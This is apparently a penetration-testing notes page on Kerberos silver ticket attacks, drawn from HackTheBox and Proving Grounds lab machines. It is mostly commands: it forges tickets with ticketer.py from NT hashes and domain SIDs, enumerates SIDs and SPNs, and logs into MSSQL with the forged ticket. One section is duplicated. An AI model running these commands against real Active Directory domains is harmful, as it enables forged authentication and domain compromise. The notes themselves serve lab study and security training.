🥈Silver Ticket Attack

Mostly we will have SeImpersonatePrivilege after getting a shell with xp_cmdshell and can use a potato attack. Sometimes intended path can be enumerating a database.

Refer PG Practice Nagota and Escape from HTB. Just because the ticket is generated won't mean it works. Check the domain in SPN:

get-addomain

This is what we are gonna use for silver ticket. If credentials acquired from Kerberoasting CHECK GetUserSPNs.py output for SPN

General syntax:

ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>

Without spn Golden ticket will be created:

ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb administrator

With SPN specified we get the ticket for a specific service:

We can use a fake user as well.

ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -spn TotesLegit/dc.sequel.htb administrator

To get existing spns:

Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName | Select-Object ServicePrincipalName

Example to get the silver ticket for a specific service:

ticketer.py -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com Administrator

Get SID

To get Domain SID

nxc ldap DC1.scrm.local -u <user> -p <pass> -k --get-sid

lookupsid.py test.local/john:password123@10.10.10.1

get-addomain

python3 getPac.py -targetUser administrator domain/user:pass

Now use the domain-sid Can also be done with ldap

MSSQL

KRB5CCNAME=administrator.ccache mssqlclient.py -k Administrator@dc.sequel.htb

Just empty enter for password. It is normal to get user as svc_mssql or similar when xp_cmdshell whoami is run.

export KRB5CCNAME=administrator.ccache

Check if ticket present with klist

Then edit /etc/krb5user.conf:] Example:

[libdefaults]
	default_realm = NAGOYA-INDUSTRIES.COM
	kdc_timesync = 1
	ccache_type = 4
	forwardable = true
	proxiable = true
    rdns = false
    dns_canonicalize_hostname = false
	fcc-mit-ticketflags = true

[realms]	
	NAGOYA-INDUSTRIES.COM = {
		kdc = nagoya.nagoya-industries.com
	}

[domain_realm]
	.nagoya-industries.com = NAGOYA-INDUSTRIES.COM

PreviousGolden Ticket Attacks NextPetitPotam

Last updated 2 months ago

MSSQL

KRB5CCNAME=administrator.ccache mssqlclient.py -k Administrator@dc.sequel.htb

Just empty enter for password. It is normal to get user as svc_mssql or similar when xp_cmdshell whoami is run.

export KRB5CCNAME=administrator.ccache

Check if ticket present with klist

Then edit /etc/krb5user.conf:] Example:

[libdefaults]
	default_realm = NAGOYA-INDUSTRIES.COM
	kdc_timesync = 1
	ccache_type = 4
	forwardable = true
	proxiable = true
    rdns = false
    dns_canonicalize_hostname = false
	fcc-mit-ticketflags = true

[realms]	
	NAGOYA-INDUSTRIES.COM = {
		kdc = nagoya.nagoya-industries.com
	}

[domain_realm]
	.nagoya-industries.com = NAGOYA-INDUSTRIES.COM